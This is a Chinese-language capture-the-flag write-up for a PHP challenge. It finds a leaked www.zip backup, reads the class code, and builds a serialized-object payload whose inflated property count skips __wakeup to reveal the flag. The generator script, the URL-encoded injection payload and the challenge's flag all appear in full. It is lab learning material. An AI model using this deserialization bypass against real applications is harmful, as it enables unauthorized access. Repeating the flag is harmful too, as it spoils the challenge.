进入网址之后如下:
从图片中可以看到关键字“良好备份”,应该网站有备份,/www.zip,http://84ac984d-d4e2-405c-8c84-a828e85691a6.node4.buuoj.cn/www.zip.下载压缩包,打开后有五个文件
?首先打开的是flag.php,但是里面的flag是错误的,紧接着打开class.php
<?php
include 'flag.php';
error_reporting(0);
class Name{
private $username = 'nonono';
private $password = 'yesyes';
public function __construct($username,$password){
$this->username = $username;
$this->password = $password;
}
function __wakeup(){
$this->username = 'guest';
}
function __destruct(){
if ($this->password != 100) {
echo "</br>NO!!!hacker!!!</br>";
echo "You name is: ";
echo $this->username;echo "</br>";
echo "You password is: ";
echo $this->password;echo "</br>";
die();
}
if ($this->username === 'admin') {
global $flag;
echo $flag;
}else{
echo "</br>hello my friend~~</br>sorry i can't give you the flag!";
die();
}
}
}
?>
根据代码的意思,我们可以发现如果username=admin,password=100然后我们再执行__destruct()时可以获得flag.
打开index.php,里面有一部分php代码
<?php
include 'class.php';
$select = $_GET['select'];
$res=unserialize(@$select);
?>
包含class.php,用get传参传入select参数,并且将结果反序列化。
我们知道当序列化字符串表示对象属性个数的值大于真实个数的属性时就会跳过__wakeup(),所以利用序列化字符串中对象的个数进行绕过__wakeup()。
__wakeup()方法绕过
作用:
与__sleep()函数相反,__sleep()函数,是在序序列化时被自动调用。__wakeup()函数,在反序列化时,被自动调用。
分析完后先进行反序列化构造
<?php
class Name{
private $username = 'nonono';
private $password = 'yesyes';
public function __construct($username,$password){
$this->username = $username;
$this->password = $password;
}
}
$a = new Name('admin',100);
echo serialize($a)."\n";
echo urlencode(serialize($a))
为了绕过wakeup()把2改大
将O%3A4%3A%22Name%22%3A2%3A%7Bs%3A14%3A%22%00Name%00username%22%3Bs%3A5%3A%22admin%22%3Bs%3A14%3A%22%00Name%00password%22%3Bi%3A100%3B%7D
改为
O%3A4%3A%22Name%22%3A3%3A%7Bs%3A14%3A%22%00Name%00username%22%3Bs%3A5%3A%22admin%22%3Bs%3A14%3A%22%00Name%00password%22%3Bi%3A100%3B%7D
然后进行get 传参
得到flag ,flag{cfab3146-101e-4860-9d2a-0706e72341b7}